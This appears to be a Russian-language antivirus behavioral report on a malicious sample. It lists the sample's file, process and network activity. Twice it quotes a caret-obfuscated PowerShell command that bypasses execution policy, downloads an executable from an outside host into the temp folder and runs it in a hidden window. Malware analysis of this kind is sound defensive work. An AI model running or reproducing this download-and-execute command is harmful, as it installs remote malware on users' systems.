Техническая информация
Вредоносные функции
Загружает и запускает на исполнение
- http://inbox.cefka.com/weat/ как $qyuwd
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /c P^owerSh^ell -ExecutionPolicy ByPass -NoProfile -command $qyuwd=$env:temp+'\yredc.exe';(Ne^w-Objec^t Net.We^bCli^e^nt).DownloadFile('http://inbox.cefka.com/weat/',$qyuwd);Start-Process $qyuw...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1928
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\916833.cvr
Сетевая активность
UDP
- DNS ASK in###.cefka.com
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c P^owerSh^ell -ExecutionPolicy ByPass -NoProfile -command $qyuwd=$env:temp+'\yredc.exe';(Ne^w-Objec^t Net.We^bCli^e^nt).DownloadFile('http://inbox.cefka.com/weat/',$qyuwd);Start-Process $qyuw...' (со скрытым окном)
